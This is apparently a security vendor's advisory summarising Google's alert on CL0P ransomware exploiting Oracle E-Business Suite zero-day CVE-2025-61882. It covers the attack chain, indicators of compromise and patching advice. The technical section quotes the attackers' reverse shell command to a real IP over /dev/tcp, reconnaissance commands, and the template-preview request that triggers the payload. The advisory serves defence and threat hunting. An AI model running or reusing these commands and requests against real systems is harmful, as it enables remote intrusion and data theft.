Google Issues Alert on CL0P Ransomware Actively Exploiting Oracle E-Business Suite Zero-Day CVE-2025-61882

Estimated reading time: 7 minutes

Key takeaways:

  • CL0P ransomware is actively exploiting a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite.
  • Organizations using Oracle EBS are urged to apply emergency patches released on October 4, 2025.
  • The campaign involves data exfiltration and delayed extortion tactics.

Table of contents:

On October 10, 2025, Google’s Threat Intelligence Group (GTIG) issued an alert regarding active exploitation of a zero-day vulnerability in Oracle E-Business Suite (EBS) by the CL0P ransomware group. The vulnerability, identified as CVE-2025-61882, is being actively exploited in the wild. Organizations using Oracle E-Business Suite are urged to apply the emergency patches released on October 4 to mitigate the risk of exploitation. This campaign underscores the strategic advantage of coupling zero-day exploitation with delayed extortion. By targeting public-facing enterprise applications, CL0P-affiliated actors can rapidly exfiltrate data at scale while evading early detection.

Campaign Details

Beginning September 29, 2025, GTIG and Mandiant detected a large-scale email campaign targeting executives at numerous organizations. The emails claimed that sensitive data had been stolen from their Oracle EBS environments. These extortion messages, sent from hundreds of compromised third-party accounts, included legitimate file listings dating back to mid-August, adding credibility to the threat. While no victims have yet appeared on the CL0P data leak site (DLS), past campaigns suggest that data may be published several weeks after the initial outreach.

Patching and Vulnerability Information

Oracle reported on October 2 that the exploited vulnerabilities had been patched in the July Critical Patch Update (CPU). They urged customers to apply the latest CPU immediately. Following this, on October 4, Oracle released emergency fixes specifically addressing CVE-2025-61882 and reiterated the importance of keeping all patches current.

Technical Analysis

GTIG’s analysis attributes the campaign to a CL0P actor with months of intrusion activity. Initial exploitation may have begun as early as July 10, 2025. By August 9, the zero-day vulnerability, CVE-2025-61882, was actively exploited against UiServlet and SyncServlet components.

The attack employs a multi-stage Java implant framework combining Server-Side Request Forgery (SSRF), CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution.

In August, attackers exploited SyncServlet via a POST request to /OA_HTML/SyncServlet. They then leveraged the XDO Template Manager to upload malicious XSL payloads to the XDO_TEMPLATES_B table. A template preview request such as /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT triggers payload execution.

The XSL payload decodes a Base64 Java implant, instantiates a ScriptEngine, and evaluates attacker-controlled code. Commands executed under the “applmgr” account include system reconnaissance (e.g., cat /etc/fstab, df -h, ip addr) and reverse shell connections (e.g., bash -i >& /dev/tcp/200.107.207.26/53 0>&1).

Two distinct Java chains, GOLDVEIN.JAVA downloader and a nested SAGE* reflective loader sequence culminating in SAGEWAVE, enable second-stage payload retrieval and persistent filter installation.

Indicators of Compromise (IOCs)

The following Indicators of Compromise have been identified in connection with this CL0P campaign targeting Oracle E-Business Suite:

Type Indicator Description
Network 200.107.207.26 IP address observed in exploitation attempts targeting UiServlet and SyncServlet components.
Network 161.97.99.49 IP address observed in exploitation attempts targeting the UiServlet component.
Network 162.55.17.215:443 GOLDVEIN.JAVA C2
Network 104.194.11.200:443 GOLDVEIN.JAVA C2
Network /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG… Indicator of an attempt to trigger the malicious XSL payload. Look for requests where TemplateCode begins with TMP or DEF.
Network /OA_HTML/configurator/UiServlet Endpoint targeted in the July 2025 exploitation activity.
Network /OA_HTML/SyncServlet Endpoint targeted in the August 2025 exploitation activity.
Network /help/state/content/destination./navId.1/navvSetId.iHelp/ HTTP path substring filtered for by SAGEWAVE.

Practical Takeaways

For Technical Staff:

  • Immediate Patching: Apply Oracle’s October 4 emergency patches for CVE-2025-61882 without delay.
  • Hunt for Malicious Templates: Review entries in the XDO\_TEMPLATES\_B table where TEMPLATE\_CODE begins with “TMP” or “DEF.”
  • Restrict Outbound Internet Access: Limit outbound Internet access from EBS servers to block command and control (C2) communications.
  • Monitor Network Logs: Look for anomalous requests to /OA_HTML/configurator/UiServlet and the TemplatePreviewPG endpoint.
  • Leverage Memory Forensics: Use memory forensics on Java processes to detect in-memory implants not visible on disk.

For Business Leaders:

  • Ensure Patch Management: Verify that your organization has a procedure in place for the rapid deployment of security patches, especially for critical enterprise applications.
  • Review Security Policies: Assess and update security policies to ensure that they adequately address the risks associated with zero-day exploits and data exfiltration.
  • Implement Network Segmentation: Use network segmentation to limit the impact of a potential breach by restricting lateral movement.
  • Enhance Security Awareness Training: Educate employees on the risks of phishing emails and the importance of reporting suspicious activity.
  • Supply-chain risk monitoring: Implement supply chain risk monitoring, particularly focusing on third-party vendors with access to your Oracle EBS environments.
  • Real-time ransomware intelligence: Subscribe to a reliable real-time ransomware intelligence feed to stay informed about emerging threats and IOCs.

PurpleOps and Proactive Cybersecurity

PurpleOps offers a range of services to help organizations proactively manage their cybersecurity posture and mitigate the risks associated with threats like the CL0P ransomware.

  • Cyber Threat Intelligence Platform: Our cyber threat intelligence platform provides real-time insights into emerging threats, including IOCs and TTPs associated with ransomware groups like CL0P. This helps organizations proactively identify and respond to potential attacks.
  • Dark Web Monitoring Service: Our dark web monitoring service helps organizations identify compromised credentials and sensitive data that may be circulating on the dark web. This information can be used to prevent account takeovers and data breaches.
  • Breach Detection and Incident Response: PurpleOps offers breach detection and incident response PurpleOps Solutions to help organizations quickly identify and contain security incidents. Our team of experienced security professionals can help you develop and implement a comprehensive incident response plan.
  • Underground Forum Intelligence: Gain access to underground forum intelligence to understand attacker tactics and strategies, enabling proactive defense measures.
  • Brand Leak Alerting: Implement brand leak alerting to identify and mitigate data leaks that could be exploited by attackers.
  • Telegram threat monitoring: We can implement telegram threat monitoring to track threat actor communications and identify potential threats.
  • Supply-chain risk monitoring: We can implement supply-chain risk monitoring, particularly focusing on third-party vendors with access to your Oracle EBS environments.

Given their history of leveraging zero-days through 2020-2025, organizations must assume they remain prime targets and maintain rigorous patch and monitoring regimes.

For more information on how PurpleOps can help protect your organization from ransomware and other cyber threats, visit our PurpleOps Solutions or contact us for a consultation at PurpleOps Solutions. You can also explore our platform for real-time cyber threat intelligence at https://www.purple-ops.io/platform/. To learn more about our red team operations or penetration testing services, visit https://www.purple-ops.io/red-team-operations and , respectively. If you have concerns about your supply chain security, check out https://www.purple-ops.io/supply-chain-information-security. Finally, for ransomware-specific protection, see https://www.purple-ops.io/protect-ransomware and for dark web monitoring capabilities, visit https://www.purple-ops.io/dark-web-monitoring.

FAQ

Q: What is CVE-2025-61882?

A: CVE-2025-61882 is a zero-day vulnerability in Oracle E-Business Suite that is being actively exploited by the CL0P ransomware group.

Q: What should organizations do to protect themselves?

A: Organizations using Oracle E-Business Suite are urged to apply the emergency patches released on October 4, 2025, to mitigate the risk of exploitation.

Q: What are the indicators of compromise (IOCs) for this campaign?

A: The IOCs include specific IP addresses and network endpoints used in the exploitation attempts, as detailed in the IOCs section above.